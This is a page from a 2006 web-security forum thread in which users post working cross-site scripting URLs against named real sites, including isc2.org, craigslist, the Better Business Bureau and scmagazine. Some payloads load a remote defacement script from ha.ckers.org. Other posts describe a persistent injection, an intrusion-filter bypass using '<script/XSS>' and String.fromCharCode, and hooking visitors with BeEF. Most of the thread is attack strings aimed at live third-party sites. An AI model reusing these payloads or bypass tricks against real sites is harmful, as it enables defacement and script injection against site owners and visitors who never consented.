Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 4 of 65
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 01:08PM

http://ha.ckers.org/expect.swf?http://www.hoovers.com/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 01:10PM

Kyran, you may be right, although the only reason I use the alert box is to prove that JavaScript can be injected... xss.js is more to prove you can include remote files into the HTML. Both are valid tests to prove XSS is possible. Personally I preferr the alert box because it's faster to test for and more obviously benign but be my guest if you want to use the remote include.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 22, 2006 01:11PM

Imagine it we had all our XSSes to change location.href to another of our XSSes. We could create a pretty damn long chain of hops.

rsnake, that reflect thing works on every pre 1.3.35, 2.0.58, and 2.2.2 Apache server that doesn't have a custom 417 error page. This includes e-commerce sites like overclocking.co.uk

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 2 time(s). Last edit at 09/22/2006 01:14PM by WhiteAcid.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 01:13PM

Thinking of making an XSS enabled web-ring? ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 22, 2006 01:16PM

I guess I was just pondering.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 01:29PM

I got a special request to enhance the defacements. This one is going out to all you XSS haXorz out there (same exploit - different flavor): http://www.scmagazine.com/us/search/index.cfm?fuseaction=XCU.Search.Simple&sSearchPhrase=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org/weird/stallowned.js%20&sSection=ALL&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 22, 2006 01:37PM

Well I would guesstimate that atleast 75% of these with alert boxes, can load remote scripts as well (i'm too lazy to run a tally) .. so while i like the idea of uniformity, everyone aside from the dumbest of skiddies should be able to figure out how to test remote inclusion.

Once the hole has been shown to be there, and precisely how to overcome its filters if any - the method of exploitation i'll leave as an exercise for the exploiter.

That being said: rather than uniformity in the PoC demonstration, i think it would be much nicer for uniformity in its cataloging .. i.e. adopt a bug report type form

I'm also too lazy to decide on all the form fields but along the lines of:

PoC link(s):
Max Length:
Filtering:
Type(s): (anything, html, <script></script>, parameter inclusion - which tag, etc.)
umm.. any other brainstorming? maybe we should make a new thread for such discussion .. however id keep it optional, cuz i'm usually to lazy for such forms except for interesting sites or filters

that also may make this more of an emulation of securityfocus.com sans moderation _-_ .. i don't know if thats an improvement or not

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 01:46PM

As long as it's interesting and (vaguely) relevant I have no interest in moderation so I won't institute it unless something starts annoying me. Spam is not tolerated, everything else is okay. I would never force someone to construct an exploit in a certain way either. It's your choice how you disclose.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 22, 2006 01:54PM

ahaha rsnake.. love the hair.

https://www.isc2.org/cgi-bin/login.cgi?Command=TempPassword&CertificateNumber=%3Cscript%3Ealert%28%22Yes%2C+this+is+the+International+Information+System+Security+Certification+Consortium.+And+Yes%2C+they+should+probably+uncertify+themselves..%22%29%3C%2Fscript%3E&LastName=&HomeCity=&x=9&y=8

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 02:04PM

Oh dear lord... ISC2? Ouch!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 22, 2006 02:15PM

How about another.. but this time persistant. https://www.isc2.org/cgi-bin/request_studyguide_process.cgi?AG=44330&Type=a1dcxbn&LName=qwerty&FName=HiMom&City=SoUnsecure

the email field in https://www.isc2.org/cgi-bin/request_studyguide_form.cgi?AG=44330 is unfiltered, except no spaces.. but on the bright side 'To protect your information, your response is 128-bit SSL enabled and all information is encrypted.'

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 03:02PM

That's really bad... I heard ISC2 was compromised at one point. Every security guy's personal information let loose. Not good.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 22, 2006 03:37PM

Ouch. Also, while the normal remote text example is fine, I might start using that stallowned.js, for..uhm...Proof of Stallownage.
Yeah. That's it.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: September 22, 2006 03:42PM

Ahahhahahahaha, no no wait, HAHAHAHA

really I don't like those fuckers, not that I am bitter that I was turned down for a job because I didn't have my CISSP...I went to 2 study sessions and couldn't believe the crap they were spouting and never went back.

__MOST POINTLESS CERT EVER__

-id

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 03:51PM

Kyran, be my guest. Hahah.

id, wait, if you didn't get a job because of it I think that by definition gives it a point. Quod erat demonstrandum. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 04:28PM

Watchfire's marketing might be dirty pool, but it sure is funny: http://ha.ckers.org/images/scmagazine-stallowned.png

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 22, 2006 04:32PM

Ahahahaha. That's hysterical.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 04:36PM

Hahah... well it looks like we made some friends: http://www.darkreading.com/blog.asp?blog_sectionid=342&f_src=darkreading_section_342

I applaud darkreading for jumping on this, and for issuing their retort. It's nice to see journalistic integrity.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 22, 2006 04:46PM

That's great! I love that people are really taking to this.
We've shown that it's really an issue. With a little e-mailing and a little luck, any xss hole can turn into a disaster for the company and their site.

Most importantly(to me ahaha), a few of the found exploits mentioned are mine.

Ego +1

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 22, 2006 04:49PM

HAHAHAHA
Oh man. I loved that.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 22, 2006 04:57PM

> .. perhaps we should all use the ha.ckers.org/xss.js script ..
why not using BeEF/hook/ ?
Then you can see who got trapped (at least those who have malware enabled in their browser;-)

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 22, 2006 05:03PM

I personally feel we should test out using SRC instead of just an alert.
I know most of the time, if you can get an alert, you can get a remote script going, but it is not always the case. In the MySpace classifieds a few weeks back, I could get an Alert off, but not a remote script or anything else. It's totally fixed now, but you get the idea.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 22, 2006 05:32PM

if you can pass alert, then you still can use parantheses, a comma is not a problem usually, hence you have anthing you need for eval(StringFromCharCode()), probably a unescape() is sufficent too ...
Any problems?

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 22, 2006 07:32PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://search.bbb.org/?searchtype=url&url=%27%3E%3Cscript%2Fmaluc%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E%3Cb+%27&search=Search better business bureau

it has an IPS that closes connection if you send <script> .. but <script/XSS> works fine.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 22, 2006 07:36PM

http://sfbay.craigslist.org/search/sss?query=</title>%3Cscript>alert('quack')</script>
http://sfbay.craigslist.org/search/sss?query=</title></head><body>%3Cscript%20src=http%3A%2F%2Fha.ckers.org/weird/stallowned.js></script> << for rsnake

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 09/22/2006 07:39PM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 23, 2006 01:07AM

http://www.allakhazam.com/fsearch.html?subject=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&content=&poster=&date1_m=1&date1_d=1&date1_y=1999&date2_m=1&date2_d=1&date2_y=2007&cats=all&dosearch=1

This was posted on the first page, I noticed something rather interesting.
In opera, this specific string doesn't produce an alert.

It comes out like this.
<input type="text" name="subject" value=""<SCRIPT>alert("XSS")</SCRIPT>"" size="30" maxlength="100" />
But, I have to close the previous tag before the script will run.
<input type="text" name="subject" value=""/><SCRIPT>alert("XSS")</SCRIPT><"" size="30" maxlength="100" />
(the last < was just to prevent the html from showing. )

It shows </script> in red, meaning it's only one tag, without a partner. The first <script> is in blue, showing it's PART of a tag, not a single tag itself.

Not really sure if it regards to anything...it's just odd.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 23, 2006 04:20AM

a <style> at the end of an XSS string will eliminate the rest of the page if there is no closing style tag.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 23, 2006 06:28AM

> It shows </script> in red, ... The first <script> is in blue ...

are you talking about mozilla's "View Source"?
Then keep in mind that it shows what it rendered, not what it got as response body from the server!

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 23, 2006 11:18AM

he is talking about Opera 9's view Source .. which highlights now too. Opera 8.5x does not

and the reason the opening <script> is in blue is because it gets inserted inside of the input tag.. Opera translates it as a parameter, with an empty value

i.e.: <INPUT type="text" name="subject" value="" <SCRIPT=""/>

thus the alert() is no longer part of a inline script, and </SCRIPT> has nothing to close. The full Opera translation being

<INPUT type="text" name="subject" value="" <SCRIPT=""/>alert("XSS")"" size="30" maxlength="100" /&gt;


Yet another way to tell the different browsers apart, which can't be spoofed like userAgent can.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 23, 2006 11:31AM

http://preference.the-dma.org/cgi/optoutemps2.php?email1=You+have+an+XSS+hole%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E&email2=&email3=

-maluc

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 4 of 65


Sorry, only registered users may post in this forum.